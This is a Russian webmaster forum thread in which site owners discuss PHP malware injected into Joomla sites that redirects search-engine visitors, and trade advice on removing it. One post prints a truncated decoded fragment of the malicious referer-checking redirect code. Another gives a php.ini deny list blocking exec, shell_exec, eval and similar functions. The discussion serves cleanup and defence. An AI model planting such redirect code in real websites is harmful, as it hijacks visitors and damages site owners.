- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Маркетинг для шоколадной фабрики. На 34% выше средний чек
Через устранение узких мест
Оксана Мамчуева
VK приобрела 70% в структуре компании-разработчика red_mad_robot
Которая участвовала в создании RuStore
Оксана Мамчуева
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Расшифровуется это дело следующим образом:
error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"yahoo") or stristr($referer,"bing") or stristr($referer,"rambler") or stristr($referer,"gogo") or stristr($referer,"live.com")or stristr($referer,"aport") or stristr($referer,"nigma") or stristr($referer,"webalta") or stristr($referer,"begun.ru") or stristr($referer,"stumbleupon.com") or stristr($referer,"bit.ly") or stristr($referer,"tinyurl.com") or preg_match("/yandex\.ru\/yandsearch\
Расшифровуется это дело следующим образом:
И самый главный вопрос: ЧЕГО ДЕЛАТЬ-ТО?!!!
качайте сайт в dream viewer включайте поиск по папке, вкидывайте туда кусок кода вредоносного. А потом вручную чистить все php файлы. За пару часов можно управиться.
ну это если бэк апа нет
А вообще, вспоминайте, какие Вы плагины устанавливали в последнее время, плагины, модули, компоненты.
Просто у самого почти все сайты на Joomla
Да сделайте бэкап
скачайте и распакуйте
в notepad++ ctrl+shift+F
находите папку с распакованными файлами и меняете ваше значение на пустую строчку
Качаете программку @Text Replacer http://www.izone.ru/text/utilities/text-replacer.htm
Качаете сайт на ПК и с ее помощью заменяете вредоносный кусок кода на пробел(скачаете программку, там все интуитивно понятно), вот и все. За пару минут программка вычистит весь вредоносный код, затем просто зальете чистый сайт на сервер.
П.С.главное при помощи этой же программки найдите скрипт, который заливает эту гадость в файлы .php, иначе простой чисткой не ограничиться
Sigizmund III,
Закройте сайт от посетителей и поисковиков, пока чистите сайт и ищите как это г... туда попало.
Чем быстрей тем лучше. Нужно поисковикам отдать заголовок "Сервер временно недоступен" приходи через N секунд.
1) В корне сайта создаём файл к примеру ddd.php (называем как хотим,,,, если назовёте по другому, не забудьте подправить .htaccess)
пихаем в ddd.php
2) Узнаём свой IP
3) лезем в .htaccess и после строки RewriteEngine On вставляем
RewriteCond %{REMOTE_ADDR} !=IPRewriteRule ^.* ddd.php [L]
Вместо букв IP вставляем свой IP адрес(пробел между знаком равно и IP адресом НЕ ставим)
P.S.
Поле Retry-After: 86400 = сутки. Сколько Вы ковырять будите? Трое суток? Ставим 259200
По поводу взлома
Удалить все ненужные моды. Почитать про права на файлы (chmod). Почаще смотреть логи. Подумать о другом хостинге.
Добрый день!
Та же проблема с bestru2.onedumb.com.
Может быть кто-нибудь подскажет, чей это платник (какой партнерской программы)?
Заражен интернет-магазин, со среды ни одного заказа из поиска. Гендир будет заявление в милицию писать в понедельник, необходимо срочно выяснить откуда ноги растут. Если кто владеет информацией о владельцах партнерки пишите здесь или в личку, будем очень признательны.
Спасибо!
0) Делаем бекап текущий зараженной версии в надежное место, если манипуляциями испортим сайт.. Меняем пароли, использует ftp клиент с шифрованием паролей на компьютере с актуальным антивирусом.
Лечим так
1) Скачиваем сайт к себе
Осуществляем поиск и замену
текста "base64_decode("DQ..." на пустое место ""
(умеет почти любая IDE)
Код везде одинаковый по идеи.
2) Чистый заливаем обратно
3) Выставляем права 444 на все файлы, чтобы они не редактировались
4) Правим php.ini, запрещаем к выполнению опасные функции
disable_functions = base64_decode, eval,exec,passthru,shell_exec,escapeshellarg,escapeshellcmd,system,proc_open, proc_get_status,proc_close,popen,show_source,chmod,symlink,fsocket,pfsockopen,fsockopen,mail,suhosin.executor.disable_emodifier,phpinfo
Если код даже везде пропишиться то перенаправлять не будет, будут сообщения о том что функция запрещена к выполнению... но и это сообщение можно отключить в настройках php
5) Ищем дырку в сайте в спокойном режиме, находим и пункт 3 можно выполнить в обратном напрваление
На чем сайт сделан? Обычно такая лажа на неактуальных версиях популярных движков бывает..
Все починили уже, всем огромное спасибо! Сайт на джумле 1.5
---------- Добавлено 25.11.2012 в 21:19 ----------
А вот владельцам этого сайтика, ручки бы по отрывал, да вставил поглубже...
А потом вручную чистить все php файлы. За пару часов можно управиться.
Прикалываетесь что-ли.. 21 век на дворе. Notepad++ как уже писали. финд энд реплэйс, [ctrl]+[F]